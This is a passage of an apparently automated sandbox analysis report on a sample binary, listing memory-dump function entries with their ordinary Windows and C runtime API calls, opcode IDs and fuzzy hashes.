                                                              • Instruction Fuzzy Hash: D851C07660020EAFDB209FA1DD89EBB3EA9FF84B10F150439FE44D6151EA39DC10D660
                                                              APIs
                                                              • std::ios_base::good.LIBCPMTD ref: 005E6DD2
                                                              • std::ios_base::getloc.LIBCPMTD ref: 005E6E54
                                                              • char_traits.LIBCPMTD ref: 005E6EE8
                                                              • std::ios_base::good.LIBCPMTD ref: 005E6F7B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: std::ios_base::good$char_traitsstd::ios_base::getloc
                                                              • String ID:
                                                              • API String ID: 1920461149-0
                                                              • Opcode ID: 1e913e89373a45d428b77791a3e7aa9ffa734fd43d045e87a5f2b4991c2479d9
                                                              • Instruction ID: 68897fe1ca2a4868c9ca65924ec907f834196f47b5faff714d7c39b27647d963
                                                              • Opcode Fuzzy Hash: 1e913e89373a45d428b77791a3e7aa9ffa734fd43d045e87a5f2b4991c2479d9
                                                              • Instruction Fuzzy Hash: 2A517EB4E0024ADFCF08DF95D896ABEBFB5BF98354F144159E5516B391CB30A940CB90
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: char_traits
                                                              • String ID:
                                                              • API String ID: 1158913984-0
                                                              • Opcode ID: c514c0fa627b61a1c8003ed86a7b3539ec778a1c4e3ab9aee6972b40f7f844b2
                                                              • Instruction ID: 9856004592fabfe05566bd6d7924b79526b72990f43217e5b721cc3af4c7ec02
                                                              • Opcode Fuzzy Hash: c514c0fa627b61a1c8003ed86a7b3539ec778a1c4e3ab9aee6972b40f7f844b2
                                                              • Instruction Fuzzy Hash: F03198B5D0018A6BCF0CEBA2D8559EE7F79BF90380F044469E5C55B242EB31DA45CBA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: f^
                                                              • API String ID: 0-1307980213
                                                              • Opcode ID: bafcf08ba17a40135bf4e0e310fcd069eaafe722958be1158c25a59da5bd7344
                                                              • Instruction ID: 4ba1e7fb749f6acb5036336495e508b4f0f4aa56325989547d0eda8a1dcf31f3
                                                              • Opcode Fuzzy Hash: bafcf08ba17a40135bf4e0e310fcd069eaafe722958be1158c25a59da5bd7344
                                                              • Instruction Fuzzy Hash: 2D117FB164060EABE711BBB99C4D7BE3FA9BF49721F540045E7019B191DFB888408B76
                                                              APIs
                                                              • GetConsoleOutputCP.KERNEL32(9EDA4073,00000000,00000000,?), ref: 005F6A8E
                                                                • Part of subcall function 005FE621: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,005FC23E,?,00000000,-00000008), ref: 005FE682
                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 005F6CE0
                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 005F6D26
                                                              • GetLastError.KERNEL32 ref: 005F6DC9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                              • String ID:
                                                              • API String ID: 2112829910-0
                                                              • Opcode ID: 1b7573db3b47502c532b46b1060408c64972c7d9e8a43d81a1f282141cce17bf
                                                              • Instruction ID: b5d6950ca85275a6d445385a9d15d103a6978ef9712abfb145cad6392d72fc06
                                                              • Opcode Fuzzy Hash: 1b7573db3b47502c532b46b1060408c64972c7d9e8a43d81a1f282141cce17bf
                                                              • Instruction Fuzzy Hash: E9D18AB5E0025D9FCF14CFA8C8949ADBFB9FF48310F28852AE556EB352D634A941CB50
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: AdjustPointer
                                                              • String ID:
                                                              • API String ID: 1740715915-0
                                                              • Opcode ID: a55e1e80d00d9d3cc173c1b1e6c803b194af2af029cd9bd26cc5c61e3eff619f
                                                              • Instruction ID: f0d649b6d8417a4c092e47711776696402e14ecc6b0f9fe3e7fbf3b372703492
                                                              • Opcode Fuzzy Hash: a55e1e80d00d9d3cc173c1b1e6c803b194af2af029cd9bd26cc5c61e3eff619f
                                                              • Instruction Fuzzy Hash: DB51E2B26002869FEB2D8F22C846BBA7FA4FF44710F244529E89D5B291D731EC52C790
                                                              APIs
                                                                • Part of subcall function 005FE621: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,005FC23E,?,00000000,-00000008), ref: 005FE682
                                                              • GetLastError.KERNEL32 ref: 005FEA03
                                                              • __dosmaperr.LIBCMT ref: 005FEA0A
                                                              • GetLastError.KERNEL32(?,?,?,?), ref: 005FEA44
                                                              • __dosmaperr.LIBCMT ref: 005FEA4B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                              • String ID:
                                                              • API String ID: 1913693674-0
                                                              • Opcode ID: ccebc81a447bf1871c4924c5ac080d1c20f605425e2e525a84c77d67db735ce1
                                                              • Instruction ID: 9efded4ca0d8e4c8f66759c3edb26eb13c94317eca5a0714c751739d2f0607d3
                                                              • Opcode Fuzzy Hash: ccebc81a447bf1871c4924c5ac080d1c20f605425e2e525a84c77d67db735ce1
                                                              • Instruction Fuzzy Hash: CF21C87160020EAFDB10AF65CC8A83BBFAAFF553647108419FB5997161D739ED508760
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cf9da8fb5f8a7124d2fb6563c917c60d4d66ad3d7cf6b2e0ea25ea66fd5a9bae
                                                              • Instruction ID: f3c4a6c1ce34a584849a0ef2782040585956a24522f7614d1890e2e010591271
                                                              • Opcode Fuzzy Hash: cf9da8fb5f8a7124d2fb6563c917c60d4d66ad3d7cf6b2e0ea25ea66fd5a9bae
                                                              • Instruction Fuzzy Hash: F921D4B160420EBFDB20AF718D4493B7FAABF80364F108919FA55D7151EB78EC9087A0
                                                              APIs
                                                              • GetEnvironmentStringsW.KERNEL32 ref: 005FF92F
                                                                • Part of subcall function 005FE621: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,005FC23E,?,00000000,-00000008), ref: 005FE682
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 005FF967
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 005FF987
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                              • String ID:
                                                              • API String ID: 158306478-0
                                                              • Opcode ID: be7d3f7ad6c0f327260f4d5aa57d0a773a2d4bbac5f1eddce697c0751690c25b
                                                              • Instruction ID: 76eb2031df55968e76a77348b720b1b2ba147020db223513e269279110712141
                                                              • Opcode Fuzzy Hash: be7d3f7ad6c0f327260f4d5aa57d0a773a2d4bbac5f1eddce697c0751690c25b
                                                              • Instruction Fuzzy Hash: B911A1F250561E7FAB1127B56D8EE7F2D9EEE983987100429FB02D1112FAACDE0146B0
                                                              APIs
                                                              • WriteConsoleW.KERNEL32(00000000,00000000,005F112F,00000000,00000000,?,00602C8C,00000000,00000001,?,?,?,005F6E1D,?,00000000,00000000), ref: 00606EF9
                                                              • GetLastError.KERNEL32(?,00602C8C,00000000,00000001,?,?,?,005F6E1D,?,00000000,00000000,?,?,?,005F73F7,00000000), ref: 00606F05
                                                                • Part of subcall function 00606ECB: CloseHandle.KERNEL32(FFFFFFFE,00606F15,?,00602C8C,00000000,00000001,?,?,?,005F6E1D,?,00000000,00000000,?,?), ref: 00606EDB
                                                              • ___initconout.LIBCMT ref: 00606F15
                                                                • Part of subcall function 00606E8D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00606EBC,00602C79,?,?,005F6E1D,?,00000000,00000000,?), ref: 00606EA0
                                                              • WriteConsoleW.KERNEL32(00000000,00000000,005F112F,00000000,?,00602C8C,00000000,00000001,?,?,?,005F6E1D,?,00000000,00000000,?), ref: 00606F2A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                              • String ID:
                                                              • API String ID: 2744216297-0
                                                              • Opcode ID: 5b9460b38423809f59eb6487e799fff675203a312a8e8a5a3d1541bc5832f117
                                                              • Instruction ID: 0663181af26663fdaa7d38028af998d3d5ff44d06d34e3414a00212ec8733df1
                                                              • Opcode Fuzzy Hash: 5b9460b38423809f59eb6487e799fff675203a312a8e8a5a3d1541bc5832f117
                                                              • Instruction Fuzzy Hash: A5F01C36480125BBCF222FA5EC049CB3F67EF083A1B148019FA4A86171CA3289209BA1
                                                              APIs
                                                              • __startOneArgErrorHandling.LIBCMT ref: 005F268D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ErrorHandling__start
                                                              • String ID: pow
                                                              • API String ID: 3213639722-2276729525
                                                              • Opcode ID: af3159b927e02f09202cb1aa81e0dbf99c80920abb5b0e22f3f464d76123fbd4
                                                              • Instruction ID: cc4570d753fc9706b802fe4c2ae944b5c9c14201989be79d5d4b5755b42fa4cd
                                                              • Opcode Fuzzy Hash: af3159b927e02f09202cb1aa81e0dbf99c80920abb5b0e22f3f464d76123fbd4
                                                              • Instruction Fuzzy Hash: C05159B5A0520E96CB117714CD0737A6F98FB80B00F248D69F795862B9FF3C8C91DA46
                                                              APIs
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 005EC88F
                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 005EC943
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritable___except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 3480331319-1018135373
                                                              • Opcode ID: deb724825939c21a3e3f53012a7c8e042ed2138f6b16af8a0295f15edcca13b1
                                                              • Instruction ID: be35967bf480df8a6eea380e93d3312dc06a6a573a325394098d72451cf1cf0a
                                                              • Opcode Fuzzy Hash: deb724825939c21a3e3f53012a7c8e042ed2138f6b16af8a0295f15edcca13b1
                                                              • Instruction Fuzzy Hash: 4141E634E003899FCF18DF6AC844A9E7FB5BF45314F148055E895AB392C731EA02CBA1
                                                              APIs
                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 005ED187
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: EncodePointer
                                                              • String ID: MOC$RCC
                                                              • API String ID: 2118026453-2084237596
                                                              • Opcode ID: cc4f4c24f669a9c6fd434c5a20bbc1143ce510b17de4fb2520c551bf96a72809
                                                              • Instruction ID: 8035996af9db1fb86f52c86ae66dff4ee157ea3bd3572ae62da9c75ddbb799a8
                                                              • Opcode Fuzzy Hash: cc4f4c24f669a9c6fd434c5a20bbc1143ce510b17de4fb2520c551bf96a72809
                                                              • Instruction Fuzzy Hash: 76416A7690024AAFCF19DF99CC81AEEBFB6BF48304F188199FA4467211D335D950DB60
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: char_traitscodecvt
                                                              • String ID:
                                                              • API String ID: 1910604377-3916222277
                                                              • Opcode ID: 5abc7e43ed70ce1aac75992c36b166b220829c2b5d9a484e524e6a915f7d5d73
                                                              • Instruction ID: 3146a55641296c8acfeef0dbb279f202ec03ce2ec6f30f88dc488ebab87edbdc
                                                              • Opcode Fuzzy Hash: 5abc7e43ed70ce1aac75992c36b166b220829c2b5d9a484e524e6a915f7d5d73
                                                              • Instruction Fuzzy Hash: 24318071D00689EFCF18CFA5CA58AEEBBB5BF44304F248099D49167241E7309F05DB90